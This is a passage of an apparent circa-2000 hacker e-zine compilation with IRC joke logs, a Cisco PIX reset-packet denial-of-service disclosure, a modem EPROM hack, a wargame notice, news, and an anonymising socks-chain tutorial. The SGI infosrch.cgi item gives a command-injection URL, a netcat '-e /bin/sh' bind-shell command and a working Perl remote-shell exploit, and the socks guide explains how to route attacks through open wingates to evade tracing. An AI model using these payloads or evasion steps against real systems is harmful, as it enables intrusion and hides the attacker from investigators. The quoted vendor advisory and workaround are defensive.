      <fREAKaZiD> jesus
      <fREAKaZiD> JESUS!
      <fREkaZ0iD> jesus
      <fREkaZ0iD> JEsus chrsist i hate this town
      <fREkaZ0iD> jesus u got a bigg rectum
      <fREAKaZiD> jesus
      <fREkaZ0iD> jesus
      <fREkaZ0iD> jesus man
      <fREkaZ0iD> hahahahahaha jesus what a wanker
      <fREkaZ0iD> jesus ignore this guy
      <fREkaZ0iD> jesus
      <fREkaZ0iD> jesus
      <fREkaZ0iD> jesus
      <fREkaZ0iD> jesus
      <fREkaZ0iD> jesus
      <fREkaZ0iD> jesus man
      <cyberphrk> vortexia, opium told me you look like jesus, now im thinking all
       weird of you
      <cyberphrk> vortexia, yeah, he's right, you're jesus
      
      And THAT, ladies and gentlemen, was the international hacking scene's
      contribution to the institution of Christianity. We hope you enjoyed it, and
      if you didn't - We don't care. Just leave us alone for Christ's sake. ;-P
      
      ;,                                                                       ,;;4,
      ,?;;$;,__________________________________________________________________,,7$;
      
      
           __... .                                                   . ...__
        d$$^^                                                             ^^$$b
      .?$;                                                                   ;$$;:;,
      _.                Cisco PIX Denial of Service by Vortexia         ._ ,;:;,, _.
      
      Hi All, just a bit of a security notification.
      
      Cisco has been informed of this problem and Im waiting for a fix for the
      problem, Ive also noted that various other firewalls are effected by this
      code, though if you wanna know if whatever you are running is effected,
      you will have to test it.
      
      A brief rundown of the problem.
      
      If you run routable ips on your internal interface on your pix, and
      routeable ips on your external interface, so the pix is not running nat,
      the pix keeps a state table of everything going on.  Anything that is not
      in your state table that attempts to come in from the outside is denied,
      even if there is a conduit in place to permit anything.  Which means that
      you have to establish a connection from your internal network to your
      external network before anything external can send data back.  This is a
      really nice feature, unfortunatly there is a big of a bug that I found in
      this.  While testing on in house equipment for possible flaws, as we
      continually test various products, I found the following.
      
      On recieving a RST packet (TCP Reset) from a given host with the correct
      source and destination port, the PIX will drop the state entry for that
      particular connection, which means the tcp connection dies due to the fact
      that no state entry the external box can no longer talk to the internal
      box.
      
      So, if we take a standard raw ip packet, give it a tcp header, and set the
      source ip as a machine that your internal box is connected to, and the
      destination ip as your internal machine, set the source port on the
      spoofed ip as the port the person is connected to, set your destination
      port on your destination ip cyclically to possible source ports on his
      side, and send resets, it will drop the persons state table entry, cutting
      him off from the box he is connected to.
      
      Now, the one question I asked when I wrote this, is why does this work,
      why is there no seq/ack checking on RST packets, this was answered in the
      TCP RFC, saying that seq/ack numbers are not checked on RST packets,
      however they are checked on FIN packets, hence using FIN packets for this
      test is futile without sequence prediction code.
      
      There is a simple work around for this problem however, and anyone wishing
      to know the details of that is free to email me at andrew@cnsec.co.za for
      details.
      
      Below I have posted example code to show the exploit and how it works, and
      hopefully this will be useful to someone on this list and help fix a
      fairly nasty denial of service problem.
      
      Many Thanks
      
      Andrew Alston
      Citec Network Securities (Director)
      Phone: (011) 787 4241
      Fax: (011) 787 4259
      Email: andrew@cnsec.co.za
      
      [Ed: Exploit code can be found in ./kodez/CiscoPIX]
      
      ;,                                                                       ,;;4,
      ,?;;$;,__________________________________________________________________,,7$;
      
      
           __... .                                                   . ...__
        d$$^^                                                             ^^$$b
      .?$;                                                                   ;$$;:;,
      _.              An Introduction to Java Servlets by Wyzewun       ._ ,;:;,, _.
      
      Java Servlets are an extremely powerful server side CGI-replacement supported
      by most major web-servers, and used by very few admins - most notably because
      they either don't know they exist or don't have the skill needed to write
      them. Java Servlets have several advantages over Perl and other traditional
      CGI languages in they are faster to write and to run, infinitely more secure,
      and have all the advantages of the extremely well furnished Java Servlet API.
      
      In this tutorial I will teach you how to write simple Java servlets. Although
      a knowledge of the Java language is not *completely* necessary to understand
      this, it will certainly help. What you *will* need is a basic knowledge of the
      HTTP protocol, of HTML, and of any object-orientated programming language.
      With that said - let's get going...
      
      Servlets are written as if normal programs except they extend the Superclass
      HttpServlet. We just override the functions doGet(), doPut(), doTrace(),
      doPost() and doDelete() -  the HTTP request each one handles is kinda obvious.
      =) Right, let's code a simple servlet quick...
      
      import javax.servlet.*;       // Import the libraries we need to make HTTP
      import javax.servlet.http.*;  // servlets and throw the right exceptions
      
      // Here we declare the class and make it extend the HttpServlet Superclass
      class SimpleExample extends HttpServlet {
      
      /* This over-rides doGet() and passes it the user's request (called "req" in
         this example) and the Servlet's response (called "res" here). Both
         exceptions thrown are required by the HttpServlet superclass */
       void doGet(HttpServletRequest req, HttpServletResponse res)
         throws ServletException, IOException {
      
         // Set HTTP Content Type
         response.setContentType("text/html");
         // Get communicating with the luser
         PrintWriter out = res.getWriter();
         // Send HTML
         out.println("<html><head><title>Servlet Output</title></head><body>"
         + "<h1>FUQ J0O!@#$</h1></body></html>");
         // Close Stream
         out.close();
      
      } // end of doGet();
      } // end of SimpleExample
      
      OK, this issue is being released tomorrow, and a chiq friend of mine bought me
      a bottle of champagne and a condom for my birthday, so I gotta be honest - I
      don't have time to finish this article. :) Will make a sequel in future issues
      if I think anybody cares enough. Cheers...
      
      ;,                                                                       ,;;4,
      ,?;;$;,__________________________________________________________________,,7$;
      
      
           __... .                                                   . ...__
        d$$^^                                                             ^^$$b
      .?$;                                                                   ;$$;:;,
      _.                Fixing M-Web Specific Modems by JungleG         ._ ,;:;,, _.
      
      <DISCLAIMER>
      I don't know anything about what I'm about to tell you - I haven't tried it
      myself.  I don't own any Mweb modems, nor do I condone doing this. If you
      ever try to turn this against me, in any way, I cannot be held responsible
      and you must pay me 100 million Rand.
      </DISCLAIMER>
      
      So, you're sitting there one day and this advert comes on the TV telling you
      that you can buy a Mweb Net-Getter (sp?) modem for R99.  Great you think,
      this is awesome, I can get myself a 56K modem for only R99, right?
      
      Wrong.
      
      The Mweb Net-Getter modem are Mweb specific, ie. they only work when you
      dial into an Mweb POP. Until now.
      
      Here's what you do:
      
      1) Find yourself an EPROM writer.  Most universities and some security companies
      have them too.
      2) Go to your favourite electronics suplier and buy a 27c2000 EPROM Chip.
      3) Find a friend / uncle / relative / boss / etc who has a Fastlink V.90
      modem.
      4) Open the Fastlink up. remove the EPROM and copy the EPROM from the
      Fastlink onto your newly Bought 27c2000 EPROM.
      5) Close the Fastlink modem up and return it.
      5) Open the Mweb modem up and replace the existing EPROM with the newly
      bought and programmed 27c2000 EPROM.
      6) Close the Mweb modem.
      7) Plug and Pray.
      8) There is no 8 .. I thought 8 looked good though.
      
      Easy as that, you now have a 56K V90 modem for R99.
      
      Jungle G
      
      ;,                                                                       ,;;4,
      ,?;;$;,__________________________________________________________________,,7$;
      
      
           __... .                                                   . ...__
        d$$^^                                                             ^^$$b
      .?$;                                                                   ;$$;:;,
      _.                       Miscellaneous IRC Gayness                ._ ,;:;,, _.
      
      <d\r\e\> heh
      <d\r\e\> you a girl?
      <Pneuma> nah, not right now, why?
      <d\r\e\> uh
      <d\r\e\> somehow that answer strikes me as awkward.
      
      <paszaz> hi there
      <Pneuma> lo
      <paszaz> do u know Back Orifice?
      <Pneuma> never met him
      <paszaz> It's not a him, it's a program
      <Pneuma> oh
      <paszaz> ok
      
      <Eth`real> what is a .tar file?
      [Ed: She's a #hack netslut - but I s'pose you figured that out already :P]
      
      [Ed: More #hack netsluttery...]
      <Andi> vans kissing my tits. r u jealous?
      <Aragon> lol
      <Aragon> no
      
      <Kat> ive hax0red everyb0dy and now im dealing in pr0n instead
      
       acid is back!!!!!!!!
      <acid> with PIZZA!!!!!!!!!!!!!!!!!!!!
      <acid> _(@^#^#_!@!@#
      <Aragon> yay
      <xanex> pizza
      <xanex> pizza
      <xanex> pizza
      <xanex> pizza
      <acid> woo hoo
      <Kat> omg im gonna order pizza
       jus awaits his pizza
      [Ed: Cretins :P]
      
      <OpTiC> if u get someone elses dial up account do u pay telkom?
      
       GreekGod is pretty good, thnx
      <Pneuma> oh, good
      <Pneuma> do u spit or swallow?
      <GreekGod> excuse me?
      <Pneuma> oh, sorry, wrong window
      <GreekGod> damn right!
      <GreekGod> lol
      <Pneuma> no, only if its really soft
      <Pneuma> wtf! wrong window again! it keeps popping up
      <GreekGod> uhm, just a matter of interest
      <GreekGod> What are you talking about?
      <Pneuma> no, thats too ruff! slower
      <Pneuma> dammit, why does this keep coming?
      <GreekGod> fuck, you are a sick person
      <Pneuma> why the hell does this come in the middle of my conversations?
      
      <NightFall> Ugly ... im 17 , hacker dude in training so to speak
      <UglyKidJoe> hacker in training ?
      <UglyKidJoe> this sounds so lame
      <NightFall> got my good fair share for being spooked the other day
      <NightFall> pinged www.fbi.gov
      <UglyKidJoe> wow
      <UglyKidJoe> u are so l33t
      <UglyKidJoe> i got to log this
      <NightFall> port tampering email was send to my isp
      <NightFall> geez
      <NightFall> I didnt even connect
      <NightFall> dumb assies
      <NightFall> got a warning
      <NightFall> dumb shit
      <NightFall> :P
      <NightFall> some crap about the american embasy being in pretoria and me not
       being imune to fbi
      <NightFall> yak yak yak
      <NightFall> :P
      
      <Harper> hehe
      <Harper> harper the unopped ;)
      <zigy> hehe
      *** Harper was kicked by Pneuma (Opped)
      
      [Ed: #Darknet elitez...]
      <Pneuma> wtf is gay-boi, he has my STDs!!!
      <Snacker> rave- : yo there ?
      <rave-> shur
      <Snacker> rave- : can u give me some hints to break in a Apache/1.3.3 (Unix)
                Debian/GNU on Linux  ?
      
      [Ed: Have I mentioned how cool #Darknet is, btw?]
      <DA^BOMB> sup rave
      <DA^BOMB> send a brotha some more passwd fles
      
      [Ed: And while we're at it, have ya seen NXT-Howto.txt by E-Mind of #Darknet?]
      
      <snip>
      Section A - What is a DNS?
      --------------------------
      
         A DNS - Domain Name Server, is used to convert host names to IP addresses
         and IP addresses to host names.
         for example: www.infoseek.com = 204.162.96.173
      </snip>
      
      <snip>
            2. What is the theory behind the exploit?
               The exploit uses a Buffed Overflow in BIND versions 8.2 - 8.2.2 to
               gain a remote root shell.
      </snip>
      
      <snip>
            6. How do I compile the exploit?
               As always:
               $gcc t666.c -o t666<ENTER>
               $
      
            7. How do I run the exploit?
               $su<ENTER>
               Password:<password><ENTER>
               #./t666 1<ENTER>
      </snip>
      
      <snip>
      Section D - Who should be credited for this HowTo?
      --------------------------------------------------
      
            1. who is the person that motivated me into writing this?
               That person is no other the gov-boi, he operates the great site
               www.hack.co.za. Without him, this How-To would have never been writen!
               Thanks Gov-Boi :)
      </snip>
      
      [Ed: Needless to say, #darknet are super-fuqn-skilled-kick-yo-azz-hax0rz]
      
      ;,                                                                       ,;;4,
      ,?;;$;,__________________________________________________________________,,7$;
      
      
           ________,,,...........                 .........______
      $$$$$$$$$^^^^^                                      '''''"""???zz.   $$
         ^?$$$                                                                `?; $$
           '$$        Daar is geen meer jy vokking Skaapnaaier!@#$%^           $;$$$
            ?;                                                              ,,?;I$$$
           ,"________________________________________________________..,,##',  $$
        _.+                                                                     +.,;
      
      k-r4d 0h-d4y ju4r3z d1ztrh03z...
      
      www.mdma.za.net/fk
      packetstorm.securify.com/mag/fk
      
      Send article submissions, hate mail, pictures of your butt, or whatever to
      wizdumb@leet.org and/or pneuma@mdma.za.net
      
      For automatic delivery of FK to your mailbox as it comes out, subscribe to
      our mailing list by sending mail to minimalist@security.za.net with
      "subscribe fk" in the subject of the message. Propz to Jus for setting this
      up for us, and propz to Mogel of scene.textfiles.com for recommending it.
      
                          < K-Leet Tail Ascii Goez Here - DOH! >
      
       JETZT WERDE ICH IN DEIN ARSCHLOCH EINDRINGEN ALS OB ES POLEN WARE !@#$%^&
      
      @HWA
      
      
294.0 [b0f] Lamagra's "roothat" hacker wargames, hack legally!
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      Site:http://roothat.labs.pulltheplug.com                                                                      
      
      Full details at site, some below. Heres a chance to enter a true hacker
      challenge, break the levels to get to level 8 the supreme master and
      don't worry about the ph3dz knocking on yer door! - Ed
     
     
     

      Games


      I've been working on some holes for this box and I came up with 7 neat 
      levels. They all handle about a different topic of exploiting. Each level 
      is more difficult than the previous one. The most simple hole is 
      "difficulty" 2, difficulty 0-1 would be a basic argument stack overflow. 
      Every hole is wrapped inside a program that actually has some purpose. The 
      source can be gotten by doing something special with the program. The 
      source will then be printed to stderr (a simple ./program 2> file.c would 
      save it, be sure to remove it quickly). This all sounds pretty big, 
      impressive and really hard, that's why I set up a hintserver to help you 
      with every level. It's source code can be gotten here. It has a small bug 
      in it to get you into level1. The hintserver is running on the port of the 
      old rsh. There are breakpoints after level1, level2 and level5. Each of 
      these levels start a new group and have their own homedir, webpage and 
      password. Inside these groups it's possible to skip a level until later 
      on, BUT to obtain the password of the next group, you have to send in all 
      exploit sources (of all levels in the group) (to lamagra@digibel.org 
      subject: roothat:level:nickname) You can keep your level inside a group 
      with backdoors (cracked backdoors (by me) will be deleted).
     
     
      Game-Rules


      Passwords and exploits should not be traded/sold/whatever, everyone has to 
      made his/her own exploits (except if you work in groups) At every 
      breakpoint all exploits has to be send in to receive the password The 
      guest account is staying open for people who *don't* want to play, it 
      should not be used by the gamers Backdoors that are easily cracked will be 
      removed 

      It would be nice if backdoors were erased after reaching a breakpoint, 
      since they serve no use anymore(Just a matter of keeping the box clean and 
      the quota down       Don't bother the other gamers in any way (DoS, 
      deleting files also removing entries on the webboard Keep everything tidy 
      including the webpages 

      If you break these rules, you'll be instantly banned from the game (not kidding). 
     
     
      @HWA 
      

295.0 [HWA] Out of the quagmire, something intersting emerges: b10z crew
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      <d0tslash> fucking tests are in the .txt bro peep it out its all fuckin good!
      
      werd.
      
      
      
      Submitted by Cruciphux/d0tslash
      
      [14:39] <Cruciphux> http://b10z.hypermart.net/
      [14:42] <Cruciphux> http://www.pots.gr/projects.html

      irix cgi rape exploit
      ~~~~~~~~~~~~~~~~~~~~~
      
      Feeling lucky? 

      1. Ok shit has changed. No more options. You can fill em in your damn self in the provided boxes.

      2. You still must use either %20 or + for space.
      
      3. By default this rapes SGI infosrch.cgi...read up at security focus if you don't know it or put the gay ass phf hole in the cgi option field or some shit.
      
      4. Like you can pick your own proxy too.
      
      5. If the layout looks like shit ... guess what... I DON'T CARE!
      
       
      
      At least glance at this. 
      <README>
      
      binaries.
      <irix.tgz>
      Read the Advisory
      <ADVISORY>
      Happy Hunting
            
            
            \\b10z\\ + d0tslash
      
      This text is to explain the 0wnage.
      nothing more  nothing less.
      
      compile netcat with #define GAPING_SECURITY_HOLE
      maybe edit Makefile and replace STATIC=-non_shared with STATIC=
      
      upload precompiled nc binary via anonftp If you have a user account 
      you may use this also (what would be the point?). place bin in /tmp
      chmod 755 the bin.
      
      exploit the infosrch.cgi hole to run command:
       /tmp/nc -l -p 11111 -e /bin/sh -i
                            ^-- added with recompile #define GAPING_SEC...
                      ^--- non privledged port
                ^---- listen for connection
      
      -e option will execute the command you specify upon connection
      
      at this point you would telnet to the port to recieve the output of the 
      command...in the above example you recieve a lame bindshell. type your
      command followed by ; 
      
      viola a bunk ass nobody shell, or if the admin was slippin r00t shell. 
      believe it or not there are a few out there running a www or root.
      
      Please see README.httprape
      
      (10 + ./)
      
      
      Advisory (Securityfocus)
      
      SGI InfoSearch fname Vulnerability
            bugtraq id 1031 
      object infosrch.cgi (exec) 
      class Input Validation Error 
      cve CVE-2000-0207 
      remote Yes 
      local Yes 
      published March 05, 2000 
      updated May 23, 2000 
      vulnerable SGI InfoSearch 1.0
         + SGI IRIX 6.5
      SGI IRIX 6.5.7
      SGI IRIX 6.5.6
      SGI IRIX 6.5.4
      SGI IRIX 6.5.3m
      SGI IRIX 6.5.3f
      SGI IRIX 6.5.3
      SGI IRIX 6.5.2m
      SGI IRIX 6.5.1
      SGI IRIX 6.5
       
      not vulnerable SGI IRIX 6.5.8
      SGI IRIX 6.2
       
      
       
      
      SGI InfoSearch fname Vulnerability
            The InfoSearch package converts man pages and other documentation into HTML web content. The search form uses infosrch.cgi which does not properly parse user input in the 'fname' variable, allowing commands to be executed at the webserver privilege level by remote web users.
      
       
      
      http&nbsp;://target/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/id
      
      /data/vulnerabilities/exploits/infosh.pl
      
      #!/usr/bin/perl -w
      # infosearch.cgi interactive shell. 
      # usage: ./infosh.pl hostname
      # 3/4/00
      # --rpc <h@ckz.org>
      
      use IO::Socket;
      use CGI ":escape";
      $|++;
      
      die "usage: $0 host\n" unless(@ARGV == 1);
      ($host) = shift @ARGV;
      
      $cgi = "/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|";
      
      # url encode and send a command.
      sub send_cmd
      {
      	my($url_command) = $cgi . CGI::escape(shift);
      	$s = IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>80,Proto=>"tcp");
      	if(!$s) { die "denied.\n"; }	
      	print $s "GET $url_command HTTP/1.0\r\n";
      	print $s "User-Agent: \r\n\r\n";
      	@result = <$s>;
      	shift @result until $result[0] =~ /^\r\n/; # uninteresting data. 
      	shift @result; $#result--;		
      return @result;
      }
      
      # draw a pseudo prompt. i like "\h:\w \$ ".
      sub prompt
      {
      	@res = send_cmd("/sbin/pwd");	
      	chomp($pwd = $res[0]);
      	print "$host:", $pwd, "\$ ";
      }
      
      prompt;
      while(!eof(STDIN)) {
      	chomp($cmd = <STDIN>);
      	print send_cmd($cmd);
      	prompt;
      }	 
      
      From the SGI Advisory (attached in full in the 'Credit' section):
      
      Although patches are available for this issue, it is realized that
      there may be situations where installing the patches immediately may
      not be possible.
      
      The steps below can be used to disable the infosrch.cgi(1) program to
      prevent exploitation of this vulnerability until patches can be installed.
      
      
      1) Become the root user on the system.
      
      % /bin/su -
      Password:
      #
      
      2) Change the permissions on the infosrch.cgi(1) program.
      
      
      =================
      **** WARNING ****
      =================
      
      Removing the permissions from the infosrch.cgi(1)
      program will prevent non-root users from using the Infosearch
      subsystem through the HTTP web server.
      
      
      # /bin/chmod 500 /usr/lib/infosearch/bin/infosrch.cgi
      
      
      3) Return to previous level.
      
      # exit
      %
      
      ---
      
      For another workaround, see "Re: Vulnerability in infosrch.cgi" in Credit. 
      
      
       
      SGI IRIX 6.5.6:
      
      SGI upgrade Maintenance Releases
      http://support.sgi.com/colls/patches/tools/relstream/index.html
      Upgrade to the latest Maintenance Release of IRIX 6.5.x here.
      
      SGI IRIX 6.5.4:
      
      SGI upgrade Maintenance Releases
      http://support.sgi.com/colls/patches/tools/relstream/index.html
      Upgrade to the latest Maintenance Release of IRIX 6.5.x here.
      
      SGI IRIX 6.5.3m:
      
      SGI upgrade Maintenance Releases
      http://support.sgi.com/colls/patches/tools/relstream/index.html
      Upgrade to the latest Maintenance Release of IRIX 6.5.x here.
      
      SGI IRIX 6.5.3f:
      
      SGI upgrade Maintenance Releases
      http://support.sgi.com/colls/patches/tools/relstream/index.html
      Upgrade to the latest Maintenance Release of IRIX 6.5.x here.
      
      SGI IRIX 6.5.3:
      
      SGI upgrade Maintenance Releases
      http://support.sgi.com/colls/patches/tools/relstream/index.html
      Upgrade to the latest Maintenance Release of IRIX 6.5.x here.
      
      SGI IRIX 6.5.2m:
      
      SGI upgrade Maintenance Releases
      http://support.sgi.com/colls/patches/tools/relstream/index.html
      Upgrade to the latest Maintenance Release of IRIX 6.5.x here.
      
      SGI IRIX 6.5.1:
      
      SGI upgrade Maintenance Releases
      http://support.sgi.com/colls/patches/tools/relstream/index.html
      Upgrade to the latest Maintenance Release of IRIX 6.5.x here.
      
      SGI IRIX 6.5:
      
      SGI upgrade Maintenance Releases
      http://support.sgi.com/colls/patches/tools/relstream/index.html
      Upgrade to the latest Maintenance Release of IRIX 6.5.x here.
       
      credit 
      Posted to Bugtraq on March 5, 2000 by rpc <rpc@inetarena.com>. 
      reference 
      advisory: 20000501-01-P: Vulnerability in infosrch.cgi
      (SGI) 
      message: infosrch.cgi vulnerability (IRIX 6.5)
      (rpc <rpc@inetarena.com>) 
      message: Re: Vulnerability in infosrch.cgi
      (Jose Nazario <jose@biocserver.BIOC.CWRU.Edu>) 
       


296.0 [MM] Cnet:AltaVista credits players $1 after contest error 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://news.cnet.com/news/0-1007-202-2236499.html

      AltaVista credits players $1 after contest error 
      By Greg Sandoval
      Staff Writer, CNET News.com
      July 10, 2000, 4:30 p.m. PT
      URL: http://news.cnet.com/news/0-1007-200-2236499.html 
      
      Thousands of people who were told erroneously that they had won $500 worth 
      of shopping credit on AltaVista last week are only going to get credit 
      worth a single dollar, the company said. 

      "Our situation is very much like when a bank mistakenly deposits money 
      into your account. It's not yours to keep. I think people understand 
      that," AltaVista spokesman David Emanuel said. 

      AltaVista is giving 1000 points, which equals a dollar's worth of credit, 
      to anyone who participated in the company's Rewards Program contest 
      between July 2 and July 4. It was during that period that some visitors 
      discovered that the Web portal's computer system would       bring up a 
      "winner notice" if the contest page was refreshed several times, AltaVista 
      said. 

      But dozens of enraged contest participants on almost a half dozen message 
      boards say they disagree with the company's version of what happened. They 
      say they received notices without ever hitting the refresher key. 

      "I have no sympathy for the people who forced it to display a winner 
      page," said player Jay Battmer in an email to CNET News.com. "But it was 
      pretty rough on those who played the game honestly and won nothing." 

      Many players called for AltaVista to honor all the winning notices, saying 
      the company made the error and should stand by the word of its notices, 
      erroneous or not. 

      Emanuel said there were 20 legitimate winners each day during that period 
      who have received their $500 credit. The others, regardless of whether the 
      person won by tinkering with the system, were incorrectly notified and are 
      not entitled to share in the winnings. 

      In accordance with the rules of the Instant Win game a member is eligible 
      to play the game once per day by clicking the link to the game page one 
      time only, according to a copy of a letter AltaVista sent to players. 

      AltaVista has apologized for the error and said it hopes the 1000 points 
      will be a step toward comforting those who thought they had won the $500 
      in credit. 

      "We have over 300,000 valued customers in our rewards program," Emanuel 
      said. "We have corrected the mistake. When we've explained what happened, 
      that it was a mistake, people seem to understand." 
      
      @HWA


297.0  [HWA] Securax "socksploitation" tutorial
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
           
      +----------------------+----------------------------------------------------+
      |   SECURAX TUTORIAL   |         ANONYMOUS CONNECTIONS OVER THE NET:        |
      |                      |               Socks Chains in Windows              |
      +----------------------+----------------------------------------------------+
      | written by Zoa_Chien |      HTML version with screenshots available at    |
      | design by nostalg1c  |           http://www.securax.org/ZC/anon/          |
      +----------------------+----------------------------------------------------+
      
      
      http://www.socks.nec.com/50001224/sc32b206.exe
      
      
      __/ introduction \___________________________________________________________
      
      this  tutorial  is an  attempt to  help you  re-route  all  internet  winsock
      applications in ms windows trough a socks chain, thus making your connections
      much more anonymous.
      
      
      
      __/ theory \_________________________________________________________________
      
      the more different hops you make your data jump, the more difficult it will
      be to trace it back. take this route for example:
      
           you --> socks1 --> socks2 --> socks3 --> ... --> socksx --> target
      
      people who want to trace you will have to contact x persons to ask their them
      for their logs. chances are one of them didn't log... and if they logged, the
      ip seen by each host/socks is the ip of the previous host/socks in the chain.
      
      this works for:
      . icq-like tools
      . ftp clients
      . mail clients
      . telnet clients
      . portscanners
      . (just about anything that uses the internet)
      
      it doesn't work on most irc servers since  they often check for open wingates
      and proxies.
      
      
      __/ now let's do it \________________________________________________________
      
      - first you need to find some boxes running wingate
      
           we look for  wingates since the default installation of wingate includes
           a non-logging socks  server on port 1080
      
           visit 
           http://proxys4all.cgi.net/win-tel-socks.shtml       or
           http://www.cyberarmy.com/lists/wingate/             for some wide-known
           wingate ips, or even better: you could try to find some yourself.
           to do  this,  i would  suggest  you  use  'proxy hunter',  available for
           download at http://www.securax.org/ZC/anon/proxyht300beta5.exe
           be sure to look  for wingates (port 23)  and not  for socks,  as we only
           want wingate socks. 
      
           you   could   also  use   wingatescan,   available   for   download   at
           http://www.securax.org/ZC/anon/wgatescan-22.zip
      
           speed is  very important  since we will be using  multiple socks, and we
           don't want  our programs  to time out. with  the  klever dipstick  tool,
           you can find out  which are the fastest  ones. (get the klever  dipstick
           program at http://klever.net/kin/static/dipstick.exe)
      
           Just fire off Dipstick.  Rightclick  in  the small green rectangular and
           choose  Show  main  window. To  import a list of wingates, just click on
           Advanced, choose Import List and select your file.
           You  can also  manually ping a  simple host  by clicking on Manual Ping.
           Use those wingates with the smallest average time. *duh*
      
      
      
      - second, check  if   the  wingates  from  the  list  are actually running :)
      
           there are  a lot of  programs that can  help you with this,  one of them
           is    server    2000,    available    for    download    at
           http://freespace.virgin.net/david.wood6/Server/Server.htm
      
      - third,  install  a  program  that  will  intercept all  outgoing networking
        calls.
      
           i  use the  great tool  sockscap for  this purpose.  you can  get it  at
           http://www.socks.nec.com/sockscap.html
      
           in the  setting, enter  this  as  socks server  : 127.0.0.1  port  8000.
           click  on  'socks  version  5'.  click  'resolve  all  names  remotely'.
           uncheck 'supported authentication'.
      
           in  the main  window, choose new  and then browse  to create a  shortcut
           for the internet client you want to give socks support.
      
           repeat this step for every program you want.
      
      - install socks chainer
      
           download it at http://www.ufasoft.com/socks
      
           in the service  menu, click on new. enter 'Chain'  as name and '8000' as
           port to accept connections on.
      
           click on  new and fill  in the ips of  the fastest  wingates you  found,
           but this time, use port 1080 for this (and not the port 23)
      
           using the  '<' and '>',  you can add and  remove socks.  be sure to test
           all socks  one by  one  before  adding  them  all to  the list  in once,
           because if  one of  them is  bad, you  chain will not work  and you will
           not be able to locate the bad socks in the chain.
      
           if all  of them  seem to  work, you  use the  '<' key  to add  them  all
           (mind  speed  problems. 4  or less  is fine.  i think  10 or  13 is  the
           limit put by tcp/ip)
      
      
      
      
      __/ testing your anonymous setup \___________________________________________
      
      to check  what socks  your computer  is connecting to, you can use x-ploiters
      totostat (http://idirect.tucows.com/files/totostat_install.exe).
      look for connections  to port 1080,  the remote ip  found there should be the
      first ip found in your chain in sockschain.
      
      use the shortcut  in sockscap that  points to your  browser, and connect  to
      http://cavency.virtualave.net/cgi-bin/env.cgi or
      http://internet.junkbuster.com/cgi-bin/show-http-headers
      
      use your shortcut  in sockcap to  start your  telnet  client then  telnet to
      ukanaix.cc.ukans.edu
      
      you can also use https://sites.inka.de:8001/cgi-bin/pyca/browser-check.py to
      test ssl or ftp.zedz.net to verify your ip via ftp.
      
      in all the above cases, the remote server should show you the ip of the last
      server in  the  sockschain.  if you  look at  the  sockschain  program while
      surfing you should see the chain being built up.
      
      
      __/ some final remarks \____________________________________________________
      
      never use  internet explorer to do tricky  stuff as it might reveal your ip.
      my personal favorite browser is opera 4.0 (http://www.opera.com/)
      
      if   you  looked   carefully   to   what  is   displayed  when   you  go  to
      the http://internet.junkbuster.com/cgi-bin/show-http-headers page, you might
      have  noticed  that  a  lot  of  stuff  about  our  client  is  being  sent.
      to avoid this, we  could install another proxy  between the sockscap and the
      sockschainer proxy that would filter out those things.
      A4proxy is an example of a proxy capable of doing such things.
      
      
      remember, if you want to do the real stuff, better switch to linux.
      
      
      Zoa_chien, 22/5/error
      #securax on EFNET
      
298.0 [IND] Hacktivism: Hacktivismo with cDc
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~      
      
      http://cultdeadcow.com/hacktivismo.html
      
     We are HACKERS and we are HACKTIVISTS. Our mandate is to keep the
     Internet free, healthy, and adventurous. We will not be bullied. HACKTIVISTS
     are not the ones who decided to shackle free speech and the open exchange
     of ideas.

     We believe in the 19th Article of the United Nations Declaration on Human
     Rights.
     We believe in the dignity of all human beings.
     And we believe in loud music and big parties. 

     Start reading. Start thinking. Start acting.

                                ***

     Below is a response to the Electrohippies rationale for supporting DDoS
     attacks. Please take the time to visit their site and make up your own mind.

     Key concepts: Electrohippies, anticorporatism, packet wankers, Denial of
     Service (DoS), Freedom of Expression, hacktivism versus [h]activism.

     One Liner: The Electrohippies are trying to rationalize Denial of Service
     attacks and violate the First Amendment privileges of their opponents.

     Links:
     http://www.gn.apc.org/pmhp/ehippies/
     Electrohippies Web site

     http://www.gn.apc.org/pmhp/ehippies/files/op1.htm
     Occasional paper no.1
     Client-side Distributed Denial-of-Service: valid campaign tactic or terorrist act?

     The Electrohippies have published an occasional paper (EOP) that asks
     whether their recently published DoS application is a valid campaign tactic or a
     terrorist act. After introducing a quote from the New Testament that
     transmogrifies Jesus Christ into a packet wanker scourging the Internet of
     E-commerce, the question is then answered with an argument that crucifies all
     common sense. This essay will address several errors from the EOP that
     require correction.

     [All quotes taken from the EOP and appear sequentially]

     "As Jesus ransacked the temple in Jerusalem because it had become a house
     of merchandise, so the recent [DDoS] attacks on e-commerce web sites are a
     protest against the manner of its [sic] recent development".

     This is the first and most egregious error that the Electrohippies make. It
     betrays their lack of understanding of hacker culture; it also creates a false
     bridge to their own anticorporate bias. As no statement of claim was made by
     the DDoS perpetrators, left-leaners, Adbuster sympathizers and wishful
     thinkers projected their own raison detre onto the event to construct an illusory
     foundation for their personal projects. In fact the DDoS attacks of early
     February were nothing more than packet wanking at its finest, or as hackers
     would say, going for the full woody. 

     It was irrelevant that the targeted sites were commercial and had e-commerce
     components. They could just have easily have been the Vatican, a Britney
     Spears fan site, or Aunt Beulahs Jam page, that is, if those sites represented
     the same level of prestige and notoriety as the actual targets. Theres a lot of
     juice in the packet wanking world associated with taking down a large site. It
     has nothing to do with e-commerce no matter what the Electrohippies, The
     Village Voice or other projectionists wish were the case.

     "Whatever the views of particular people about the development of e-commerce
     on the Net [sic], we must not ignore the fact that as another part of societys
     public space the Internet will be used by groups and individuals as a means of
     protest. There is no practical difference between cyberspace and the street in
     terms of how people use the Net [sic]".

     E-commerce is a technology. It is used across the board by not-for-profit
     groups, independent record companies, and transnational corporations. It is
     this last group, one assumes, that the Electrohippies take issue with. But
     there is no effective difference between this method of exchange and the use of
     cash or credit off-line. By attacking e-commerce the Electrohippies create the
     impression that they are Luddites when what they mean to say is that they are
